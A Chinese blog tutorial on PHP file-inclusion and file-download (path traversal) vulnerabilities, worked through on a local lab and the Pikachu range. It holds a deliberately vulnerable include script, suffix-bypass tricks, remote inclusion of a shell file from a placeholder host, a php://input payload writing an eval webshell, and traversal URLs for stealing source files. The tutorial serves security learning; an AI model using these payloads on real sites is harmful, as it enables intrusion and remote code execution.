文件操作漏洞

最新推荐文章于 2024-07-19 11:58:22 发布
最新推荐文章于 2024-07-19 11:58:22 发布
阅读量920 收藏 6
点赞数 8
分类专栏: 网络安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44603865/article/details/136639590
版权

文件操作漏洞

文件被解析,文件包含漏洞

显示源代码,文件读取漏洞

提示文件下载,文件下载漏洞

文件包含漏洞

原理

将文件包含后调用文件的指定代码,例如对象方法的调用,Python 进行import库后,调用该库的函数

文件包含的各个脚本代码

<! --#include file="1.asp" -->   //ASP
<! --#include file="top.aspx" -->  //ASP
<c:import url="http://thief.one/1.jsp"> //JSP远程包含
<jsp:include page="head.jsp"/>   //JSP本地包含
<%@ include file="head.jsp"%>   //PHP
<?php include('test.php')?>

演示

创建php文件

<?php 
$filename=$_GET['filename']
include($filename)
?>

创建 txt 文件1.txt

<?php phpinfo(); ?>

访问漏洞地址,等于include(<?php phpinfo(); ?>)从而运行 php 代码

http://127.0.0.1:8080/include.php?filename=1.txt

文件包含就是将指定文件以脚本代码去执行,可控变量:filename,漏洞函数:include()

漏洞检测

白盒

代码审计,在代码里发现include()函数,并找到可以利用的可控变量

黑盒

  • 漏洞扫描发现可能存在的漏洞,浏览器查找破解方法
  • 观察数据包里可利用的参数,或者功能点可能包含有什么漏洞函数

本地包含

只能访问到本地的文件,攻击木马必须要上传到靶机本地,让靶机进行包含才能运行木马

本地包含限制

<?php 
$filename=$_GET['filename']
include($filename.".html")  //拼接一个后缀
?>

http://127.0.0.1:8080/include.php?filename=1.txt

filename=1.txt =>1.txt.html找不到文件

绕过方法

%00截断拼接的后缀,php5.3以后不能用

http://127.0.0.1:8080/include.php?filename=1.txt%00

长度截断,因为文件命名有长度上线,可以增长文件名长度超过上限,使后面增加的后缀失效

http://127.0.0.1:8080/include.php?filename=1.txt/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

远程包含

可以包含到远程的数据,可以在攻击服务器上设置木马文件,操控靶机远程包含攻击服务器上的木马文件

http://127.0.0.1:8080/include.php?filename=http://www.xxx.com/getshell.txt

若有限制

<?php 
$filename=$_GET['filename']
include($filename.".html")  //拼接一个后缀
?>

可以通过后面加?,``%20,%23`绕过

http://127.0.0.1:8080/include.php?filename=http://www.xxx.com/getshell.txt%20 http://127.0.0.1:8080/include.php?filename=http://www.xxx.com/getshell.txt%23 http://127.0.0.1:8080/include.php?filename=http://www.xxx.com/getshell.txt?

php 伪协议的使用

1.读取页面的源代码 php://fliter
php://fliter/read=convert.base64-encode/resource=[文件名]
2.执行 php 代码
  • 把执行代码写在数据包中 php://input
php://input+[Post 数据]

POST
body:
<?php phpinfo();?>

写入一句话木马,先创建文件再把代码写进去

一般用于文件上传被拦截,可以通过文件包含写入木马

php://input+[Post 数据]

POST
body:
<?php fput(fopen('shell.php','w'),'<?php @eval($_GET[cmd]?>') ?>

有一种玩法,不创造新文件,把木马写到系统日志,然后用 php 包含

  • 把执行代码写在 url上
data://text/plain,<?php phpinfo();?>

也可以运行 base64编码后的代码

data://text/plain;base64,JTNDJTNGcGhwJTIwcGhwaW5mbyUyOCUyOSUzQg==?>

漏洞修复

固定后缀

比如

<?php 
$filename=$_GET['filename']
include($filename.".html")  //拼接一个后缀
?>
固定文件

把包含文件写死,不要传入一个可变参数,给被利用的可乘之机


<?php 
include("shell.php")  
?>

文件下载漏洞

原理

利用php 的下载方法下载在靶机的文件

1.打开网页的下载连接,以pikachu 靶场为演示

图片地址

http://localhost/vul/unsafedownload/download/ai.png

图片下载地址

http://localhost/vul/unsafedownload/execdownload.php?filename=ai.png

2.发现可变参数 filename,判断参数 filename 是查找download下的文件进行下载
在这里插入图片描述

3.可以把该页面源代码文件放在 download下,再用参数filename指定下载源代码

http://localhost/vul/unsafedownload/download/execdownload.php?filename=execdownload.php

4.但是因为execdownload.phpdownload是同级,无法下载可通过跳级来改变文件目录

http://localhost/vul/unsafedownload/download/execdownload.php?filename=../execdownload.php

5.可能是浏览器问题不需要download,在execdownload.php文件下就可下载

http://localhost/vul/unsafedownload/execdownload.php?filename=../execdownload.php

页面源代码

<?php


$PIKA_ROOT_DIR =  "../../";

include_once $PIKA_ROOT_DIR."inc/function.php";

header("Content-type:text/html;charset=utf-8");
// $file_name="cookie.jpg";
$file_path="download/{$_GET['filename']}";
//用以解决中文不能显示出来的问题
$file_path=iconv("utf-8","gb2312",$file_path);

//首先要判断给定的文件存在与否
if(!file_exists($file_path)){
    skip("你要下载的文件不存在,请重新下载", 'unsafe_down.php');
    return ;
}
$fp=fopen($file_path,"rb");
$file_size=filesize($file_path);
//下载文件需要用到的头
ob_clean();//输出前一定要clean一下,否则图片打不开
Header("Content-type: application/octet-stream");
Header("Accept-Ranges: bytes");
Header("Accept-Length:".$file_size);
Header("Content-Disposition: attachment; filename=".basename($file_path));
$buffer=1024;
$file_count=0;
//向浏览器返回数据

//循环读取文件流,然后返回到浏览器feof确认是否到EOF
while(!feof($fp) && $file_count<$file_size){

    $file_con=fread($fp,$buffer);
    $file_count+=$buffer;

    echo $file_con;
}
fclose($fp);
?>

1.通过以上代码发现有inc/function.php,尝试出 inc 是 根目录下的文件

在这里插入图片描述

2.则用 url目录跳转到该目录下即可下载function.php文件,分析从download目录跳转到根目录需要跳三级则

http://localhost/vul/unsafedownload/download/execdownload.php?filename=../../../inc/function.php

http://localhost/vul/unsafedownload/execdownload.php?filename=../../../inc/function.php

下载关键敏感配置文件

1.先知道敏感文件的绝对路径

方法

  • 扫描工具爬虫或扫描地址
  • 下载好的文件代码中去分析路径和包含文件获取

漏洞检测

1.查看可变参数

read.xxx?filename=
down.xxx?filename=
downfile.xxx?file=
readfile.xxx?file=
../ ..\ ./ .\等
%00 ? %23 %20 等
&readpath=、&filepath=、&path=、&inputfile、&url、&data、&readfile=、&menu、META-INF、WEB-INF
小知识

WEB-INF/web.xml网站配置文件会体现出 Java 路径所对应的控制类,从而知道该网站都有哪些访问路径

控制类一般在WEB-INF/classes/com

时雨夏树
关注
  • 8
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
文件泄露漏洞
bbszhenshuai的博客
05-18 1190
导语 这些信息泄露的漏洞只有马虎的程序员才会犯,希望大家都不要犯错哦~ 这些题在ctfhub里都可以重做哒。 网站源码 可能会有马虎的程序员将整个网站的源码打包起来且放在了网站目录下,导致我们可以直接获取网站的源码,给我们进一步渗透提供了更加广泛的思路。 题目给了我们常见的备份文件字段和后缀,那我们直接写脚本就行了 #! python3 import requests url1 = 'http://challenge-8b081249201cd9d3.sandbox.ctfhub.com:10080/'
文件上传漏洞
weixin_44127339的博客
07-06 215
文件上传漏洞闯关 每次打开的时候总是会忘记怎么打开,先记下来,以防过很久之后就彻底忘了该怎么动了。 先交代一下前期准备的工作吧。联网是肯定的,无网寸步难行嘛,之后将xampp里的环境全部关闭,主要是前两个,一定要关闭,要不然apache的端口会和phpstudy里apache的端口冲突,所以要关闭前一个,打开后一个。再在firefox(我一般是用火狐)里输入127.0.0.1就能打开关卡了,之后就...
WEB安全基础-文件操作漏洞
IT1995的博客
01-22 4884
文件操作漏洞   常见文件操作文件上传 上传头像; 上传附件; 文件下载 下载应用; 下载附件;   文件上传 上传Webshell 上传木马 文件下载 下载系统任意文件 下载程序代码     常见文件操作漏洞文件处理不当 1.可以上传可执行脚本 2.脚本拥有执行权
文件包含漏洞
只有不断学习才不会被茫茫人海淹没!
05-06 4416
这里写目录标题理论漏洞产生原因利用方式防御绕过方式php伪协议实战 理论 漏洞产生原因 1、include出现错误时,不会影响php代码的执行,require会中断php代码的执行 2、include有返回值,require没有返回值; 3、include可以包含多次,include_once只包含一次,后者一样。 利用方式 防御 绕过方式 php伪协议实战 ......
文件操作漏洞总结.xmind
05-30
文件操作漏洞总结.xmind
CNNVD漏洞资源文件
01-04
3. **利用脚本**:用于攻击的代码,演示了如何利用漏洞执行恶意操作,通常是教育目的,不应在未经授权的情况下用于实际攻击。 4. **缓解措施**:为修复漏洞提供的建议,包括补丁应用、配置调整等,对于系统管理员来...
thinkphp6文件写入漏洞
01-08
标题中的“ThinkPHP6文件写入漏洞”是一个关于网络安全的具体问题,主要涉及到的是ThinkPHP6框架在处理文件操作时可能出现的安全隐患。ThinkPHP是广泛应用于中国的一个开源PHP框架,其最新版本6.0在设计和实现过程中...
解析web文件操作常见安全漏洞(目录、文件名检测漏洞)
12-18
在Web开发中,确保文件操作的安全至关重要,因为不恰当的文件操作可能会导致严重的安全漏洞,例如目录遍历攻击和文件包含漏洞。目录遍历漏洞允许攻击者通过输入特定的路径来访问服务器上原本不应公开的文件,而文件...
Adminer≤4.6.2任意文件读取漏洞1
08-03
- 配置数据库的`secure_file_priv`选项,限制文件操作的范围。 - 使用防火墙或其他安全设备限制对数据库服务器的访问。 - 对敏感的系统文件进行权限控制,避免非授权访问。 了解并防范这类漏洞对于保护数据库系统免...
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 542
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 772
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
全文翻译 | OWASP《LLM安全与治理检查清单》
lurenjia404的博客
07-17 809
本文是OWASP(开放式网络应用安全项目)发布的《LLM AI安全与治理清单》(以下简称“清单”),旨在为使用大型语言模型(LLM)的组织提供安全与治理方面的指导。清单强调了负责任和可信的人工智能(AI)的重要性,并指出AI技术,尤其是LLM,在创新、效率和商业成功方面具有巨大潜力,同时也带来了明显的挑战。文中讨论了LLM面临的挑战,包括控制和数据平面的不可分割性、非确定性设计、语义搜索的使用等,并强调了LLM增加的攻击面和相关风险。
园区道路车辆智能管控视频解决方案,打造安全畅通的园区交通环境
TSINGSEE青犀视频官方技术博客
07-16 804
AI智能分析网关V4消防通道占用算法基于人工智能视觉分析技术,通过摄像头实时监测识别是否有机动车违规停放在消防车通道上,并及时提醒管理人员进行处理。
[Linux安全运维] OpenVPN部署
最新发布
Da1NtY的博客
07-19 673
同样的,在创建服务端证书的时候也需要输入一个Common Name用户名,注意与根证书用户名不一样。下载网址: https://github.com/OpenVPN/easy-rsa。2.6.1 将服务端所需的必要文件放到/etc/openvpn/中。2.6.2 将客户端所需的必要文件放到/root/client/中。创建/etc/openvpn/目录,将easy-rsa放进去。签约证书需要输入根证书的密码,与签约服务端证书时的过程一样。在日志文件/var/log/中创建一个openvpn/
数据库安全审计系统:筑牢数据安全防线 提高数据资产安全
2401_82472120的博客
07-17 425
其可以监控和审计用户对数据库中的数据库表、视图、序列、包、存储过程、函数、库、索引、同义词、快照、触发器等的访问、创建、修改和删除等,分析的内容可以精确到SQL操作语句级别。另外,它还可以根据设置的规则,智能判断出违规操作数据库的行为,并对违规行为进行记录、报警。通过对用户访问数据库行为的记录、分析和汇报,来帮助用户事后生成合规报告、事故追根溯源,同时通过大数据搜索技术提供高效查询审计报告,定位事件原因,以便日后查询、分析、过滤,实现加强内外部数据库网络行为的监控与审计,提高数据资产安全。
保障低压设备安全!中国星坤连接器精密工艺解析!
weixin_50506145的博客
07-16 522
随着技术的发展,对连接器的需求也在不断提升,特别是在低电压应用领域。中国星坤最新推出的低压连接器,以其精密性和安全性,为低电压设备提供了一个可靠的连接解决方案。中国星坤的低压连接器,以其卓越的性能和广泛的应用前景,为低电压设备的安全稳定运行提供了有力保障。随着技术的不断进步和市场需求的增长,低压连接器将在更多领域展现其独特的价值,成为连接现代电子世界的可靠伙伴。:在医疗领域,低压连接器用于连接各种便携式医疗监测设备,确保数据传输的准确性和设备的稳定性。:由于设计简洁,连接器的维护和更换变得简单快捷。
安全防御:防火墙基本模块
zhugedali_的博客
07-16 858
它会检查每个传入和传出的数据包的头部信息,包括源 IP 地址、目的 IP 地址、源端口、目的端口、协议类型(如 TCP、UDP、ICMP 等)以及数据包的标志位等。如果允许,防火墙会创建一个状态表项来记录该连接的状态,包括连接的方向、数据包的序列号等。- IDS/IPS 模块通常使用多种检测技术,包括基于特征的检测、基于异常的检测和基于协议分析的检测等,以提高检测的准确性和有效性。- 日志模块负责记录防火墙处理的所有活动和事件,包括数据包的过滤决策、连接的建立和终止、管理员的操作等详细信息。
Lianwei 安全周报|2024.07.15
联蔚盘云的博客
07-15 1261
新的一周又开始了,以下是本周「Lianwei周报」,我们总结推荐了本周的政策/标准/指南最新动态、热点资讯和安全事件,保证大家不错过本周的每一个重点!
怎么防止文件操作漏洞注入
04-03
5. 在文件操作前检查文件权限,确保只有必要的用户有权操作文件,防止非法用户篡改文件内容。 6. 对于上传文件,要限制上传文件的类型和大小,避免上传恶意文件,同时也要对上传文件进行病毒扫描等安全检测。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值